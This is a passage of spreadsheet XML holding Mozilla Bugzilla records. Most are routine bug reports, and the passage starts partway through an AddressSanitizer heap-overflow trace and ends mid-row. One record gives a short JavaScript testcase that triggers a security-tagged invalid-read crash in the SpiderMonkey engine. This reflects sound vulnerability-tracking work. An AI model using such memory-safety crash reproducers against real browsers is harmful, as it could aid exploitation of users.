    #5 0x89ad50 in js::jit::CodeGenerator::generate() js/src/jit/CodeGenerator.cpp:6235
    #6 0x969923 in js::jit::GenerateCode(js::jit::MIRGenerator*, js::jit::LIRGraph*, js::jit::MacroAssembler*) js/src/jit/Ion.cpp:1598
    #7 0xfc3f8f in js::WorkerThread::handleIonWorkload() js/src/jsworkers.cpp:798
    #8 0xfc3060 in js::WorkerThread::threadLoop() js/src/jsworkers.cpp:1034
    #9 0x10fe1a8 in nspr::Thread::ThreadRoutine(void*) js/src/vm/PosixNSPR.cpp:45
    #10 0x7f5405482e99 in start_thread /build/buildd/eglibc-2.15/nptl/pthread_create.c:308
Thread T3 (Analysis Helper) created by T0 here:
    #0 0x424c06 in __interceptor_pthread_create _asan_rtl_
    #1 0x10fe427 in PR_CreateThread(PRThreadType, void (*)(void*), void*, PRThreadPriority, PRThreadScope, PRThreadState, unsigned int) js/src/vm/PosixNSPR.cpp:108
    #2 0xfbbe15 in js::GlobalWorkerThreadState::ensureInitialized() js/src/jsworkers.cpp:437
    #3 0xfc4e28 in js::EnsureWorkerThreadsInitialized(js::ExclusiveContext*) js/src/jsworkers.cpp:44
    #4 0xea90f3 in js::ScriptSource::setSourceCopy(js::ExclusiveContext*, char16_t const*, unsigned int, bool, js::SourceCompressionTask*) js/src/jsscript.cpp:1611
    #5 0x549af8 in js::frontend::CompileScript(js::ExclusiveContext*, js::LifoAlloc*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSScript*&gt;, JS::ReadOnlyCompileOptions const&amp;, char16_t const*, unsigned long, JSString*, unsigned int, js::SourceCompressionTask*) js/src/frontend/BytecodeCompiler.cpp:225
    #6 0xcdd2e5 in JS::Compile(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::ReadOnlyCompileOptions const&amp;, char16_t const*, unsigned long) js/src/jsapi.cpp:4470
    #7 0xcdd854 in mozilla::VectorBase&lt;char, 8ul, js::TempAllocPolicy, js::Vector&lt;char, 8ul, js::TempAllocPolicy&gt; &gt;::begin() js/src/jsapi.cpp:4485
    #8 0x486317 in RunFile(JSContext*, JS::Handle&lt;JSObject*&gt;, char const*, _IO_FILE*, bool) js/src/shell/js.cpp:447
    #9 0x47ea00 in ProcessArgs(JSContext*, JSObject*, js::cli::OptionParser*) js/src/shell/js.cpp:5732
    #10 0x7f54042a376c in __libc_start_main /build/buildd/eglibc-2.15/csu/libc-start.c:226
SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 ??
Shadow bytes around the buggy address:
  0x0c2280004780: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
  0x0c2280004790: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c22800047a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c22800047b0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c22800047c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=&gt;0x0c22800047d0: 00 00 00 00 00 00 00 00[fa]fa fa fa fa fa fa fa
  0x0c22800047e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c22800047f0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2280004800: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c2280004810: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c2280004820: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
==46451==ABORTING
No test is available for this issue, reproducing it only yields an intended OOM crash. Thread scheduling is probably the reason that it doesn't reproduce properly.</t>
        </is>
      </c>
      <c r="X4894" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4895">
      <c r="A4895" t="n">
        <v>1171185</v>
      </c>
      <c r="B4895" t="inlineStr">
        <is>
          <t>2015-06-03 14:00:14 -0700</t>
        </is>
      </c>
      <c r="C4895" t="inlineStr">
        <is>
          <t>[spark] Tethering / internet sharing does not work with IPv6-only APNs</t>
        </is>
      </c>
      <c r="D4895" t="inlineStr">
        <is>
          <t>2015-08-19 05:02:31 -0700</t>
        </is>
      </c>
      <c r="E4895" t="n">
        <v>1</v>
      </c>
      <c r="F4895" t="n">
        <v>1</v>
      </c>
      <c r="G4895" t="n">
        <v>6</v>
      </c>
      <c r="H4895" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4895" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J4895" t="inlineStr">
        <is>
          <t>RIL</t>
        </is>
      </c>
      <c r="K4895" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4895" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M4895" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N4895" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4895" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4895" t="inlineStr">
        <is>
          <t>[bzlite][spark]</t>
        </is>
      </c>
      <c r="Q4895" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4895" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4895" t="inlineStr">
        <is>
          <t>2.2 S14 (12june)</t>
        </is>
      </c>
      <c r="T4895" t="n">
        <v>1</v>
      </c>
      <c r="U4895" t="n">
        <v>0</v>
      </c>
      <c r="V4895" t="n">
        <v>50</v>
      </c>
      <c r="W4895" t="inlineStr">
        <is>
          <t>User-Agent: Mozilla/5.0 (Mobile; rv:41.0) Gecko/41.0 Firefox/41.0
I'm unable to get a working connection to the Internet through the Wi-Fi hotspot on my Aries device.
Devices can successfully connect to my hotspot and communicate with other devices in 192.168.x.y, but are unable to connect to the outside world. DNS doesn't resolve, and ping 8.8.8.8 reports "destination net unreachable."
I can ping and communicate with the host phone at 192.168.1.1, and the host phone itself continues to have a working internet connection; sites load normally.</t>
        </is>
      </c>
      <c r="X4895" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4896">
      <c r="A4896" t="n">
        <v>530435</v>
      </c>
      <c r="B4896" t="inlineStr">
        <is>
          <t>2009-11-22 10:53:39 -0800</t>
        </is>
      </c>
      <c r="C4896" t="inlineStr">
        <is>
          <t>on front page, replace right side nav for "sport" with "fashion"</t>
        </is>
      </c>
      <c r="D4896" t="inlineStr">
        <is>
          <t>2013-05-07 21:49:51 -0700</t>
        </is>
      </c>
      <c r="E4896" t="n">
        <v>1</v>
      </c>
      <c r="F4896" t="n">
        <v>1</v>
      </c>
      <c r="G4896" t="n">
        <v>6</v>
      </c>
      <c r="H4896" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4896" t="inlineStr">
        <is>
          <t>Websites Graveyard</t>
        </is>
      </c>
      <c r="J4896" t="inlineStr">
        <is>
          <t>getpersonas.com</t>
        </is>
      </c>
      <c r="K4896" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4896" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4896" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4896" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4896" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4896" t="inlineStr"/>
      <c r="Q4896" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4896" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4896" t="inlineStr">
        <is>
          <t>2.0</t>
        </is>
      </c>
      <c r="T4896" t="n">
        <v>1</v>
      </c>
      <c r="U4896" t="n">
        <v>0</v>
      </c>
      <c r="V4896" t="n">
        <v>3</v>
      </c>
      <c r="W4896" t="inlineStr">
        <is>
          <t>1. Go to: http://sm-personas01.mozilla.org/en-US/
2. Under Discover More Personas, notice link to "Sports"
Please remove link to "Sports" and insert a link to "Fashion" above Film/TV. This should link to http://sm-personas01.mozilla.org/en-US/gallery/Fashion</t>
        </is>
      </c>
      <c r="X4896" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4897">
      <c r="A4897" t="n">
        <v>1533300</v>
      </c>
      <c r="B4897" t="inlineStr">
        <is>
          <t>2019-03-07 01:35:25 -0800</t>
        </is>
      </c>
      <c r="C4897" t="inlineStr">
        <is>
          <t>Upgrade NSS in Thunderbird to fix bug 1507135 and bug 1507174</t>
        </is>
      </c>
      <c r="D4897" t="inlineStr">
        <is>
          <t>2019-03-07 12:43:43 -0800</t>
        </is>
      </c>
      <c r="E4897" t="n">
        <v>1</v>
      </c>
      <c r="F4897" t="n">
        <v>1</v>
      </c>
      <c r="G4897" t="n">
        <v>3</v>
      </c>
      <c r="H4897" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4897" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J4897" t="inlineStr">
        <is>
          <t>Security: S/MIME</t>
        </is>
      </c>
      <c r="K4897" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4897" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4897" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4897" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4897" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4897" t="inlineStr"/>
      <c r="Q4897" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4897" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4897" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4897" t="n">
        <v>1</v>
      </c>
      <c r="U4897" t="n">
        <v>0</v>
      </c>
      <c r="V4897" t="n">
        <v>2</v>
      </c>
      <c r="W4897" t="inlineStr">
        <is>
          <t>Upgrade NSS in Thunderbird to fix bug 1507135 and bug 1507174</t>
        </is>
      </c>
      <c r="X4897" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4898">
      <c r="A4898" t="n">
        <v>167203</v>
      </c>
      <c r="B4898" t="inlineStr">
        <is>
          <t>2002-09-06 16:13:27 -0700</t>
        </is>
      </c>
      <c r="C4898" t="inlineStr">
        <is>
          <t>crash in nsDefaultURIFixup.cpp</t>
        </is>
      </c>
      <c r="D4898" t="inlineStr">
        <is>
          <t>2002-09-09 10:31:25 -0700</t>
        </is>
      </c>
      <c r="E4898" t="n">
        <v>1</v>
      </c>
      <c r="F4898" t="n">
        <v>1</v>
      </c>
      <c r="G4898" t="n">
        <v>3</v>
      </c>
      <c r="H4898" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4898" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4898" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K4898" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4898" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4898" t="inlineStr">
        <is>
          <t>Windows 98</t>
        </is>
      </c>
      <c r="N4898" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4898" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4898" t="inlineStr"/>
      <c r="Q4898" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4898" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4898" t="inlineStr">
        <is>
          <t>mozilla1.2beta</t>
        </is>
      </c>
      <c r="T4898" t="n">
        <v>1</v>
      </c>
      <c r="U4898" t="n">
        <v>0</v>
      </c>
      <c r="V4898" t="n">
        <v>9</v>
      </c>
      <c r="W4898" t="inlineStr">
        <is>
          <t>in nsDefaultURIFixup.cpp line 202, aURI is checked for non-nullness:
202     if (aURI &amp;&amp; aFixupFlags &amp; FIXUP_FLAGS_MAKE_ALTERNATE_URI) {
that's probably a typo and should mean *aURI
(because if aURI is null, a crash already happens on line 58 where the out param
is zeroed.)
I suspect that this is the reason for the crash with talkback ID 10348675, as
the top lines of it are these:
nsDefaultURIFixup::MakeAlternateURI
[c:/builds/seamonkey/mozilla/docshell/base/nsDefaultURIFixup.cpp, line 226]
nsDefaultURIFixup::CreateFixupURI
[c:/builds/seamonkey/mozilla/docshell/base/nsDefaultURIFixup.cpp, line 206]
(line numbers are known to be a bit off...)
I'll attach a patch to change aURI to *aURI.</t>
        </is>
      </c>
      <c r="X4898" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4899">
      <c r="A4899" t="n">
        <v>122787</v>
      </c>
      <c r="B4899" t="inlineStr">
        <is>
          <t>2002-01-31 08:20:36 -0800</t>
        </is>
      </c>
      <c r="C4899" t="inlineStr">
        <is>
          <t>(nsIURI) nsStandardURL::SetFileName doesn't recalculate mPath</t>
        </is>
      </c>
      <c r="D4899" t="inlineStr">
        <is>
          <t>2002-02-01 13:08:50 -0800</t>
        </is>
      </c>
      <c r="E4899" t="n">
        <v>1</v>
      </c>
      <c r="F4899" t="n">
        <v>1</v>
      </c>
      <c r="G4899" t="n">
        <v>3</v>
      </c>
      <c r="H4899" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4899" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4899" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K4899" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4899" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4899" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4899" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4899" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4899" t="inlineStr"/>
      <c r="Q4899" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4899" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4899" t="inlineStr">
        <is>
          <t>mozilla0.9.9</t>
        </is>
      </c>
      <c r="T4899" t="n">
        <v>1</v>
      </c>
      <c r="U4899" t="n">
        <v>0</v>
      </c>
      <c r="V4899" t="n">
        <v>8</v>
      </c>
      <c r="W4899" t="inlineStr">
        <is>
          <t>For publishing, I came across this interesting bug.
For publishing we create an nsIURI with an url that doesn't have the file
extension.  The extension is added later.  When the code calls
nsStandardURL::SetFileName to set the name with the extension, everything is
reset except mPath which is left as the path without the extension.  During
publishing, the HTTP put tries to GetPath but it doesn't get the whole path.
Regardless, this seems like it could be a pretty serious problem (if someone
SetFileName to "" or something less than what was there.
I have a fix in my own tree but I'm not an expert in this area so I'd like some
idea of the right approach (manually fix the mLen for mPath or call some other
method to do the recalculation).</t>
        </is>
      </c>
      <c r="X4899" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4900">
      <c r="A4900" t="n">
        <v>637577</v>
      </c>
      <c r="B4900" t="inlineStr">
        <is>
          <t>2011-02-28 23:05:04 -0800</t>
        </is>
      </c>
      <c r="C4900" t="inlineStr">
        <is>
          <t>test and talos jobs are not running on linux64 slaves</t>
        </is>
      </c>
      <c r="D4900" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E4900" t="n">
        <v>1</v>
      </c>
      <c r="F4900" t="n">
        <v>1</v>
      </c>
      <c r="G4900" t="n">
        <v>5</v>
      </c>
      <c r="H4900" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4900" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J4900" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4900" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4900" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4900" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4900" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4900" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4900" t="inlineStr"/>
      <c r="Q4900" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4900" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4900" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4900" t="n">
        <v>1</v>
      </c>
      <c r="U4900" t="n">
        <v>0</v>
      </c>
      <c r="V4900" t="n">
        <v>6</v>
      </c>
      <c r="W4900" t="inlineStr">
        <is>
          <t>Affecting at least mozilla-central and try.</t>
        </is>
      </c>
      <c r="X4900" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4901">
      <c r="A4901" t="n">
        <v>20980</v>
      </c>
      <c r="B4901" t="inlineStr">
        <is>
          <t>1999-12-06 17:56:49 -0800</t>
        </is>
      </c>
      <c r="C4901" t="inlineStr">
        <is>
          <t>[DOGFOOD] format="flowed" breaks mail display</t>
        </is>
      </c>
      <c r="D4901" t="inlineStr">
        <is>
          <t>2004-11-22 17:25:08 -0800</t>
        </is>
      </c>
      <c r="E4901" t="n">
        <v>1</v>
      </c>
      <c r="F4901" t="n">
        <v>1</v>
      </c>
      <c r="G4901" t="n">
        <v>2</v>
      </c>
      <c r="H4901" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4901" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J4901" t="inlineStr">
        <is>
          <t>MailNews: Message Display</t>
        </is>
      </c>
      <c r="K4901" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4901" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4901" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4901" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4901" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4901" t="inlineStr"/>
      <c r="Q4901" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4901" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4901" t="inlineStr">
        <is>
          <t>M12</t>
        </is>
      </c>
      <c r="T4901" t="n">
        <v>1</v>
      </c>
      <c r="U4901" t="n">
        <v>0</v>
      </c>
      <c r="V4901" t="n">
        <v>18</v>
      </c>
      <c r="W4901" t="inlineStr">
        <is>
          <t>I got a message with
Content-Type: text/plain; charset="us-ascii" ; format="flowed"
which displays wrong.  Taking out format="flowed" fixes the display.
Attaching the message and a screenshot of display.</t>
        </is>
      </c>
      <c r="X4901" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4902">
      <c r="A4902" t="n">
        <v>617227</v>
      </c>
      <c r="B4902" t="inlineStr">
        <is>
          <t>2010-12-06 17:54:24 -0800</t>
        </is>
      </c>
      <c r="C4902" t="inlineStr">
        <is>
          <t>build new About:Mobile newsletter signup page</t>
        </is>
      </c>
      <c r="D4902" t="inlineStr">
        <is>
          <t>2012-08-23 00:16:07 -0700</t>
        </is>
      </c>
      <c r="E4902" t="n">
        <v>1</v>
      </c>
      <c r="F4902" t="n">
        <v>1</v>
      </c>
      <c r="G4902" t="n">
        <v>5</v>
      </c>
      <c r="H4902" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4902" t="inlineStr">
        <is>
          <t>www.mozilla.org</t>
        </is>
      </c>
      <c r="J4902" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4902" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4902" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4902" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4902" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4902" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4902" t="inlineStr">
        <is>
          <t>[post redesign]</t>
        </is>
      </c>
      <c r="Q4902" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4902" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4902" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="T4902" t="n">
        <v>1</v>
      </c>
      <c r="U4902" t="n">
        <v>0</v>
      </c>
      <c r="V4902" t="n">
        <v>8</v>
      </c>
      <c r="W4902" t="inlineStr">
        <is>
          <t>Please build the About:Mobile newsletter signup page in the new nova style. PSD is here:
http://intothefuzz.com/leetom/Mozilla.com/PSD/newslettersignup_aboutmobile_01.psd
Given that this is such a late-breaking request, I'm not putting it in the [redesign] group. It should be fixed as soon as possible after the site launch, though.
Thanks!</t>
        </is>
      </c>
      <c r="X4902" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4903">
      <c r="A4903" t="n">
        <v>1384953</v>
      </c>
      <c r="B4903" t="inlineStr">
        <is>
          <t>2017-07-27 08:04:28 -0700</t>
        </is>
      </c>
      <c r="C4903" t="inlineStr">
        <is>
          <t>Library icon animation is covered behind active tab when saving to Pocket or adding a bookmark</t>
        </is>
      </c>
      <c r="D4903" t="inlineStr">
        <is>
          <t>2022-03-25 16:05:53 -0700</t>
        </is>
      </c>
      <c r="E4903" t="n">
        <v>1</v>
      </c>
      <c r="F4903" t="n">
        <v>1</v>
      </c>
      <c r="G4903" t="n">
        <v>2</v>
      </c>
      <c r="H4903" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4903" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4903" t="inlineStr">
        <is>
          <t>Theme</t>
        </is>
      </c>
      <c r="K4903" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4903" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4903" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4903" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4903" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4903" t="inlineStr">
        <is>
          <t>[reserve-photon-animation]</t>
        </is>
      </c>
      <c r="Q4903" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4903" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4903" t="inlineStr">
        <is>
          <t>Firefox 57</t>
        </is>
      </c>
      <c r="T4903" t="n">
        <v>1</v>
      </c>
      <c r="U4903" t="n">
        <v>0</v>
      </c>
      <c r="V4903" t="n">
        <v>22</v>
      </c>
      <c r="W4903" t="inlineStr">
        <is>
          <t>Created attachment 8890878
pocket animation covered by tab.mov
When saving to Pocket, the Pocket icon animation is being covered by an active tab. Please see video for reference.</t>
        </is>
      </c>
      <c r="X4903" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4904">
      <c r="A4904" t="n">
        <v>801195</v>
      </c>
      <c r="B4904" t="inlineStr">
        <is>
          <t>2012-10-12 16:54:19 -0700</t>
        </is>
      </c>
      <c r="C4904" t="inlineStr">
        <is>
          <t>Opt-only crash with invalid read [@ js::gc::MarkInternal&lt;JSScript&gt;]</t>
        </is>
      </c>
      <c r="D4904" t="inlineStr">
        <is>
          <t>2013-04-30 18:41:23 -0700</t>
        </is>
      </c>
      <c r="E4904" t="n">
        <v>1</v>
      </c>
      <c r="F4904" t="n">
        <v>1</v>
      </c>
      <c r="G4904" t="n">
        <v>3</v>
      </c>
      <c r="H4904" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4904" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4904" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4904" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4904" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4904" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4904" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4904" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4904" t="inlineStr">
        <is>
          <t>[jsbugmon:update,ignore][adv-main18+][adv-esr17+][adv-esr10+]</t>
        </is>
      </c>
      <c r="Q4904" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4904" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4904" t="inlineStr">
        <is>
          <t>mozilla20</t>
        </is>
      </c>
      <c r="T4904" t="n">
        <v>1</v>
      </c>
      <c r="U4904" t="n">
        <v>0</v>
      </c>
      <c r="V4904" t="n">
        <v>29</v>
      </c>
      <c r="W4904" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 90857937b601 (run with --ion-eager):
gczeal(2, 2)
evaluate("\
function f() {\
  r = arguments;\
  test();\
  yield 170;\
}\
function test() {\
  for (var i in f());\
}\
test();\
",{ newContext: true, compileAndGo: false, global: newGlobal('new-compartment') });</t>
        </is>
      </c>
      <c r="X4904" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4905">
      <c r="A4905" t="n">
        <v>1357246</v>
      </c>
      <c r="B4905" t="inlineStr">
        <is>
          <t>2017-04-17 19:22:14 -0700</t>
        </is>
      </c>
      <c r="C4905" t="inlineStr">
        <is>
          <t>move de-nulling to processor</t>
        </is>
      </c>
      <c r="D4905" t="inlineStr">
        <is>
          <t>2019-02-13 12:09:31 -0800</t>
        </is>
      </c>
      <c r="E4905" t="n">
        <v>1</v>
      </c>
      <c r="F4905" t="n">
        <v>1</v>
      </c>
      <c r="G4905" t="n">
        <v>4</v>
      </c>
      <c r="H4905" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4905" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J4905" t="inlineStr">
        <is>
          <t>Processor</t>
        </is>
      </c>
      <c r="K4905" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4905" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4905" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4905" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4905" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4905" t="inlineStr"/>
      <c r="Q4905" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4905" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4905" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4905" t="n">
        <v>1</v>
      </c>
      <c r="U4905" t="n">
        <v>0</v>
      </c>
      <c r="V4905" t="n">
        <v>11</v>
      </c>
      <c r="W4905" t="inlineStr">
        <is>
          <t>Antenna, like the Socorro collector, removes null bytes from keys and values in the raw crash data. It's been doing it for a while, so it might be "safe", but my basic problem with this is that I don't think the collector should be modifying the crash at all.
Seems like it makes more sense for the processor to do a de-nulling pass. Then if we discover bugs or oddities, we can fix them in the processor and re-process the affected crashes. Further, the processor already has a notes field where it can log how it changed the crash and what problems it encountered.
This bug covers looking into moving the de-nulling code. Maybe it's something we wait on thinking about until after we've rewritten the processor.</t>
        </is>
      </c>
      <c r="X4905" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4906">
      <c r="A4906" t="n">
        <v>57012</v>
      </c>
      <c r="B4906" t="inlineStr">
        <is>
          <t>2000-10-17 10:44:29 -0700</t>
        </is>
      </c>
      <c r="C4906" t="inlineStr">
        <is>
          <t>POST data has garbage during Shockwave Registration</t>
        </is>
      </c>
      <c r="D4906" t="inlineStr">
        <is>
          <t>2008-10-22 01:24:08 -0700</t>
        </is>
      </c>
      <c r="E4906" t="n">
        <v>1</v>
      </c>
      <c r="F4906" t="n">
        <v>1</v>
      </c>
      <c r="G4906" t="n">
        <v>3</v>
      </c>
      <c r="H4906" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4906" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4906" t="inlineStr">
        <is>
          <t>Networking: HTTP</t>
        </is>
      </c>
      <c r="K4906" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4906" t="inlineStr">
        <is>
          <t>PowerPC</t>
        </is>
      </c>
      <c r="M4906" t="inlineStr">
        <is>
          <t>Mac System 8.6</t>
        </is>
      </c>
      <c r="N4906" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
